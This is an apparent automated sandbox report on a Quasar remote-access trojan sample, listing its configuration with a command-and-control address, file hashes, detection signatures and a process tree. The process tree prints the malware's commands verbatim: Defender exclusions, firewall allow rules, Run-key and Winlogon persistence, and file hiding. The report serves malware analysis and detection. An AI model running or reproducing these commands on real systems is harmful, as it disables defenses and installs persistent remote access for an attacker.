quasar | 105e455731e490cb5fd0c456f265dc986842d3d69906ad6b94235d19255931af

Analysis

max time kernel
88s
max time network
127s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
12-10-2023 02:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

105e455731e490cb5fd0c456f265dc986842d3d69906ad6b94235d19255931af.exe
Size

1.4MB
MD5

19f46c41f3f272a9d8119a738c21d8c6
SHA1

7cafe3ea1336554c7fd31cb64d0d278bc8428b8b
SHA256

105e455731e490cb5fd0c456f265dc986842d3d69906ad6b94235d19255931af
SHA512

7cd233e53213d0bb530b6e73ae023d751ee3cb957ac58764f93b31817bd06ff80a42ae86f96fbb5c11c71ee330f041c56325fe2121198b408fd3ddd42c09515a
SSDEEP

24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk

Score

10^/10

quasar -evasion persistence spyware trojan upx

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

94.131.105.161:12344

Mutex

QSR_MUTEX_UEgITWnMKnRP3EZFzK

Attributes

encryption_key
5Q0JQBQQfAUHRJTcAIOF
install_name
lient.exe
log_directory
Lugs
reconnect_delay
3000
startup_key
itartup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/2152-144-0x00000000000B0000-0x000000000010E000-memory.dmp	family_quasar
behavioral1/memory/2152-145-0x00000000000B0000-0x000000000010E000-memory.dmp	family_quasar

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

T1543.003

pid	Process
2892	netsh.exe
2232	netsh.exe

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x00070000000120ec-77.dat	acprotect
behavioral1/files/0x00070000000120ec-76.dat	acprotect

Executes dropped EXE 3 IoCs

pid	Process
2576	7z.exe
2384	ratt.exe
1540	ratt.exe

Loads dropped DLL 5 IoCs

pid	Process
2736	cmd.exe
2736	cmd.exe
2576	7z.exe
1616	powershell.exe
2736	cmd.exe

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x002d000000015c6a-70.dat	upx
behavioral1/files/0x002d000000015c6a-71.dat	upx
behavioral1/files/0x002d000000015c6a-74.dat	upx
behavioral1/files/0x00070000000120ec-77.dat	upx
behavioral1/files/0x00070000000120ec-76.dat	upx
behavioral1/memory/2576-75-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/files/0x002d000000015c6a-72.dat	upx
behavioral1/memory/2576-79-0x0000000010000000-0x00000000100E2000-memory.dmp	upx
behavioral1/memory/2576-82-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/memory/2576-88-0x0000000000400000-0x0000000000432000-memory.dmp	upx
behavioral1/memory/1616-99-0x00000000026A0000-0x00000000026E0000-memory.dmp	upx
behavioral1/memory/1616-100-0x00000000026A0000-0x00000000026E0000-memory.dmp	upx

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ratt = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ratt.exe"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
876	PING.EXE
240	PING.EXE
2336	PING.EXE
1348	PING.EXE
1496	PING.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3048	powershell.exe
2564	powershell.exe
1068	powershell.exe
2844	powershell.exe
1944	powershell.exe
1616	powershell.exe
2384	ratt.exe
1540	ratt.exe
2384	ratt.exe
1540	ratt.exe
1540	ratt.exe
2384	ratt.exe
2384	ratt.exe
2384	ratt.exe
2384	ratt.exe
1540	ratt.exe
1540	ratt.exe
1540	ratt.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2720	WMIC.exe
Token: SeSecurityPrivilege	2720	WMIC.exe
Token: SeTakeOwnershipPrivilege	2720	WMIC.exe
Token: SeLoadDriverPrivilege	2720	WMIC.exe
Token: SeSystemProfilePrivilege	2720	WMIC.exe
Token: SeSystemtimePrivilege	2720	WMIC.exe
Token: SeProfSingleProcessPrivilege	2720	WMIC.exe
Token: SeIncBasePriorityPrivilege	2720	WMIC.exe
Token: SeCreatePagefilePrivilege	2720	WMIC.exe
Token: SeBackupPrivilege	2720	WMIC.exe
Token: SeRestorePrivilege	2720	WMIC.exe
Token: SeShutdownPrivilege	2720	WMIC.exe
Token: SeDebugPrivilege	2720	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2720	WMIC.exe
Token: SeRemoteShutdownPrivilege	2720	WMIC.exe
Token: SeUndockPrivilege	2720	WMIC.exe
Token: SeManageVolumePrivilege	2720	WMIC.exe
Token: 33	2720	WMIC.exe
Token: 34	2720	WMIC.exe
Token: 35	2720	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2720	WMIC.exe
Token: SeSecurityPrivilege	2720	WMIC.exe
Token: SeTakeOwnershipPrivilege	2720	WMIC.exe
Token: SeLoadDriverPrivilege	2720	WMIC.exe
Token: SeSystemProfilePrivilege	2720	WMIC.exe
Token: SeSystemtimePrivilege	2720	WMIC.exe
Token: SeProfSingleProcessPrivilege	2720	WMIC.exe
Token: SeIncBasePriorityPrivilege	2720	WMIC.exe
Token: SeCreatePagefilePrivilege	2720	WMIC.exe
Token: SeBackupPrivilege	2720	WMIC.exe
Token: SeRestorePrivilege	2720	WMIC.exe
Token: SeShutdownPrivilege	2720	WMIC.exe
Token: SeDebugPrivilege	2720	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2720	WMIC.exe
Token: SeRemoteShutdownPrivilege	2720	WMIC.exe
Token: SeUndockPrivilege	2720	WMIC.exe
Token: SeManageVolumePrivilege	2720	WMIC.exe
Token: 33	2720	WMIC.exe
Token: 34	2720	WMIC.exe
Token: 35	2720	WMIC.exe
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeIncreaseQuotaPrivilege	2056	WMIC.exe
Token: SeSecurityPrivilege	2056	WMIC.exe
Token: SeTakeOwnershipPrivilege	2056	WMIC.exe
Token: SeLoadDriverPrivilege	2056	WMIC.exe
Token: SeSystemProfilePrivilege	2056	WMIC.exe
Token: SeSystemtimePrivilege	2056	WMIC.exe
Token: SeProfSingleProcessPrivilege	2056	WMIC.exe
Token: SeIncBasePriorityPrivilege	2056	WMIC.exe
Token: SeCreatePagefilePrivilege	2056	WMIC.exe
Token: SeBackupPrivilege	2056	WMIC.exe
Token: SeRestorePrivilege	2056	WMIC.exe
Token: SeShutdownPrivilege	2056	WMIC.exe
Token: SeDebugPrivilege	2056	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2056	WMIC.exe
Token: SeRemoteShutdownPrivilege	2056	WMIC.exe
Token: SeUndockPrivilege	2056	WMIC.exe
Token: SeManageVolumePrivilege	2056	WMIC.exe
Token: 33	2056	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2220 wrote to memory of 2736	2220	105e455731e490cb5fd0c456f265dc986842d3d69906ad6b94235d19255931af.exe	28
PID 2220 wrote to memory of 2736	2220	105e455731e490cb5fd0c456f265dc986842d3d69906ad6b94235d19255931af.exe	28
PID 2220 wrote to memory of 2736	2220	105e455731e490cb5fd0c456f265dc986842d3d69906ad6b94235d19255931af.exe	28
PID 2220 wrote to memory of 2736	2220	105e455731e490cb5fd0c456f265dc986842d3d69906ad6b94235d19255931af.exe	28
PID 2736 wrote to memory of 2632	2736	cmd.exe	30
PID 2736 wrote to memory of 2632	2736	cmd.exe	30
PID 2736 wrote to memory of 2632	2736	cmd.exe	30
PID 2736 wrote to memory of 2632	2736	cmd.exe	30
PID 2632 wrote to memory of 2592	2632	cmd.exe	31
PID 2632 wrote to memory of 2592	2632	cmd.exe	31
PID 2632 wrote to memory of 2592	2632	cmd.exe	31
PID 2632 wrote to memory of 2592	2632	cmd.exe	31
PID 2736 wrote to memory of 2744	2736	cmd.exe	32
PID 2736 wrote to memory of 2744	2736	cmd.exe	32
PID 2736 wrote to memory of 2744	2736	cmd.exe	32
PID 2736 wrote to memory of 2744	2736	cmd.exe	32
PID 2744 wrote to memory of 2720	2744	cmd.exe	33
PID 2744 wrote to memory of 2720	2744	cmd.exe	33
PID 2744 wrote to memory of 2720	2744	cmd.exe	33
PID 2744 wrote to memory of 2720	2744	cmd.exe	33
PID 2736 wrote to memory of 3048	2736	cmd.exe	35
PID 2736 wrote to memory of 3048	2736	cmd.exe	35
PID 2736 wrote to memory of 3048	2736	cmd.exe	35
PID 2736 wrote to memory of 3048	2736	cmd.exe	35
PID 2736 wrote to memory of 2564	2736	cmd.exe	36
PID 2736 wrote to memory of 2564	2736	cmd.exe	36
PID 2736 wrote to memory of 2564	2736	cmd.exe	36
PID 2736 wrote to memory of 2564	2736	cmd.exe	36
PID 2736 wrote to memory of 1068	2736	cmd.exe	37
PID 2736 wrote to memory of 1068	2736	cmd.exe	37
PID 2736 wrote to memory of 1068	2736	cmd.exe	37
PID 2736 wrote to memory of 1068	2736	cmd.exe	37
PID 2736 wrote to memory of 2844	2736	cmd.exe	38
PID 2736 wrote to memory of 2844	2736	cmd.exe	38
PID 2736 wrote to memory of 2844	2736	cmd.exe	38
PID 2736 wrote to memory of 2844	2736	cmd.exe	38
PID 2736 wrote to memory of 1944	2736	cmd.exe	39
PID 2736 wrote to memory of 1944	2736	cmd.exe	39
PID 2736 wrote to memory of 1944	2736	cmd.exe	39
PID 2736 wrote to memory of 1944	2736	cmd.exe	39
PID 2736 wrote to memory of 2576	2736	cmd.exe	40
PID 2736 wrote to memory of 2576	2736	cmd.exe	40
PID 2736 wrote to memory of 2576	2736	cmd.exe	40
PID 2736 wrote to memory of 2576	2736	cmd.exe	40
PID 2736 wrote to memory of 1616	2736	cmd.exe	43
PID 2736 wrote to memory of 1616	2736	cmd.exe	43
PID 2736 wrote to memory of 1616	2736	cmd.exe	43
PID 2736 wrote to memory of 1616	2736	cmd.exe	43
PID 1616 wrote to memory of 2892	1616	powershell.exe	44
PID 1616 wrote to memory of 2892	1616	powershell.exe	44
PID 1616 wrote to memory of 2892	1616	powershell.exe	44
PID 1616 wrote to memory of 2892	1616	powershell.exe	44
PID 1616 wrote to memory of 2232	1616	powershell.exe	45
PID 1616 wrote to memory of 2232	1616	powershell.exe	45
PID 1616 wrote to memory of 2232	1616	powershell.exe	45
PID 1616 wrote to memory of 2232	1616	powershell.exe	45
PID 1616 wrote to memory of 1384	1616	powershell.exe	46
PID 1616 wrote to memory of 1384	1616	powershell.exe	46
PID 1616 wrote to memory of 1384	1616	powershell.exe	46
PID 1616 wrote to memory of 1384	1616	powershell.exe	46
PID 1384 wrote to memory of 2056	1384	cmd.exe	47
PID 1384 wrote to memory of 2056	1384	cmd.exe	47
PID 1384 wrote to memory of 2056	1384	cmd.exe	47
PID 1384 wrote to memory of 2056	1384	cmd.exe	47

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2280	attrib.exe

C:\Users\Admin\AppData\Local\Temp\105e455731e490cb5fd0c456f265dc986842d3d69906ad6b94235d19255931af.exe
"C:\Users\Admin\AppData\Local\Temp\105e455731e490cb5fd0c456f265dc986842d3d69906ad6b94235d19255931af.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2632
  - - C:\Windows\SysWOW64\nslookup.exe
      nslookup myip.opendns.com. resolver1.opendns.com
      4⤵
      PID:2592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2744
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic ComputerSystem get Domain
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2720
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3048
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2564
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1068
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2844
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
- - C:\Users\Admin\AppData\Local\Temp\7z.exe
    7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2576
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps1
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1616
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:2892
  - - C:\Windows\SysWOW64\netsh.exe
      "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      PID:2232
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1384
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic computersystem where name="KGPMNUDG" set AutomaticManagedPagefile=False
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2056
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe"
      4⤵
      PID:2060
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
        5⤵
        
        PID:2012
  - - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe
      "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:2384
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 6 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        5⤵
        
        PID:940
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 6
        6⤵
        Runs ping.exe
        
        PID:1348
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        6⤵
        
        PID:1568
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 20 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 20 > nul && "C:\Users\Admin\Music\rot.exe"
        5⤵
        
        PID:1152
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 20
        6⤵
        Runs ping.exe
        
        PID:1496
  - - C:\Windows\SysWOW64\attrib.exe
      "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
      4⤵
      Views/modifies file attributes
      PID:2280
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
    3⤵
    - Adds Run key to start application
    PID:1672
- - C:\Users\Admin\AppData\Local\Temp\ratt.exe
    "ratt.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1540
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
      4⤵
      PID:1656
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 7
        5⤵
        Runs ping.exe
        
        PID:2336
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"
        5⤵
        
        PID:2188
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c ping 127.0.0.1 -n 10 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 10 > nul && "C:\Users\Admin\Music\rot.exe"
      4⤵
      PID:2340
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 10
        5⤵
        Runs ping.exe
        
        PID:876
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 10
        5⤵
        Runs ping.exe
        
        PID:240
    - - C:\Users\Admin\Music\rot.exe
        
        "C:\Users\Admin\Music\rot.exe"
        5⤵
        
        PID:1768
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:2152
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:2716
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        
        PID:544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe

Filesize
147.9MB

MD5
bff7569c6a5df6dd56d256ba9d6f9ade

SHA1
cdf2bad88aeb39389f97d569319ba6c6a6aedde6

SHA256
cb27d10a4ff70e2d5940f9e84ccb4718ce197804d68d757b993d8285426765ac

SHA512
f682be26b7505912d4f9d16f6507132baacf72819a63e5ce8d6a947808f73314fca9389f7c22955f66749d7c644bd52a27e0207fdcffcf9c30c1ae4b7b04edb8

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe

Filesize
154.0MB

MD5
d206194d75200f97a69e904de1583a3f

SHA1
5b29b7784dd7735626da92fc81166e06b27ba071

SHA256
34f0a5aa756314b98ee2963ff6fb575664deb1c0bc141e44f405223d47eaaae7

SHA512
91eb846ad6d9b81bd7a7b78508e2966e505dbb82a0bdfcf0243a002f4868b59a3d50d0e3cbb0dd06c552745c0127a842de949235e41e21607ef3aa63df691045

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.dll

Filesize
328KB

MD5
15bbbe562f9be3e5dcbb834e635cc231

SHA1
7c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a

SHA256
ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde

SHA512
769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7z.exe

Filesize
71KB

MD5
8ba2e41b330ae9356e62eb63514cf82e

SHA1
8dc266467a5a0d587ed0181d4344581ef4ff30b2

SHA256
ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea

SHA512
2fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Add.ps1

Filesize
1KB

MD5
0df43097e0f0acd04d9e17fb43d618b9

SHA1
69b3ade12cb228393a93624e65f41604a17c83b6

SHA256
c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873

SHA512
01ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.7z

Filesize
693KB

MD5
7de6fdf3629c73bf0c29a96fa23ae055

SHA1
dcb37f6d43977601c6460b17387a89b9e4c0609a

SHA256
069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff

SHA512
d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.bat

Filesize
1KB

MD5
7ea1fec84d76294d9256ae3dca7676b2

SHA1
1e335451d1cbb6951bc77bf75430f4d983491342

SHA256
9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

SHA512
ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.bat

Filesize
1KB

MD5
7ea1fec84d76294d9256ae3dca7676b2

SHA1
1e335451d1cbb6951bc77bf75430f4d983491342

SHA256
9a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940

SHA512
ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
199.5MB

MD5
2dd36b3cb4d78043b98a850888b155e4

SHA1
ae5736f9fc8d992da152ed9b41bdfcf11848801c

SHA256
97c05c3b1cc697789f132bdcdc31b2279a2a4ece7549b0a8dbc3d889728bdc74

SHA512
8d91b81e1d13945373fde2e05003501d4daf8034d36c5e2cfb15c6c6cc9bb550d46e6394c947d737bfa2f7c34e29114509233c9dff18cff8923e99c81940fe4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ratt.exe

Filesize
657.9MB

MD5
4ad03f83a6310f8c6a29347f3db33644

SHA1
c7b2088583f2b6bb726b9722d4ffdddf86c3341b

SHA256
dedea5f74697ba5edb8c9eb66ec52d4abcf0f65a47bb7209ae53b72d37b2afd3

SHA512
bd57fa2ae778e8e28b12eb02da4bd561d0e54565c8ed807f24720e35dbf7f0c973948fff0c85c392d4700cd9ad5294778b967862dcc18a4f0a8a50ed6119a02d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GCY8QCIPX38Q32YBX26Q.temp

Filesize
7KB

MD5
9cb65d7728b33ed04cd88ad944728094

SHA1
660aaa7a2060aca7b3d9e14006eec7a6f0e98c84

SHA256
121f8ed38e0b7b2fd9767aa44e5396d97fce2c77c7ba740de1ba9ad70675851a

SHA512
134cc3581ab51bced485bab8fb9259b35a4fad1db5e447a082d0386c481aa9d8e62ad66de383f47f5886f9bf9563252510008a02ab8e70886efea7941388a2bd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
9cb65d7728b33ed04cd88ad944728094

SHA1
660aaa7a2060aca7b3d9e14006eec7a6f0e98c84

SHA256
121f8ed38e0b7b2fd9767aa44e5396d97fce2c77c7ba740de1ba9ad70675851a

SHA512
134cc3581ab51bced485bab8fb9259b35a4fad1db5e447a082d0386c481aa9d8e62ad66de383f47f5886f9bf9563252510008a02ab8e70886efea7941388a2bd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
9cb65d7728b33ed04cd88ad944728094

SHA1
660aaa7a2060aca7b3d9e14006eec7a6f0e98c84

SHA256
121f8ed38e0b7b2fd9767aa44e5396d97fce2c77c7ba740de1ba9ad70675851a

SHA512
134cc3581ab51bced485bab8fb9259b35a4fad1db5e447a082d0386c481aa9d8e62ad66de383f47f5886f9bf9563252510008a02ab8e70886efea7941388a2bd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
9cb65d7728b33ed04cd88ad944728094

SHA1
660aaa7a2060aca7b3d9e14006eec7a6f0e98c84

SHA256
121f8ed38e0b7b2fd9767aa44e5396d97fce2c77c7ba740de1ba9ad70675851a

SHA512
134cc3581ab51bced485bab8fb9259b35a4fad1db5e447a082d0386c481aa9d8e62ad66de383f47f5886f9bf9563252510008a02ab8e70886efea7941388a2bd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
9cb65d7728b33ed04cd88ad944728094

SHA1
660aaa7a2060aca7b3d9e14006eec7a6f0e98c84

SHA256
121f8ed38e0b7b2fd9767aa44e5396d97fce2c77c7ba740de1ba9ad70675851a

SHA512
134cc3581ab51bced485bab8fb9259b35a4fad1db5e447a082d0386c481aa9d8e62ad66de383f47f5886f9bf9563252510008a02ab8e70886efea7941388a2bd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
9cb65d7728b33ed04cd88ad944728094

SHA1
660aaa7a2060aca7b3d9e14006eec7a6f0e98c84

SHA256
121f8ed38e0b7b2fd9767aa44e5396d97fce2c77c7ba740de1ba9ad70675851a

SHA512
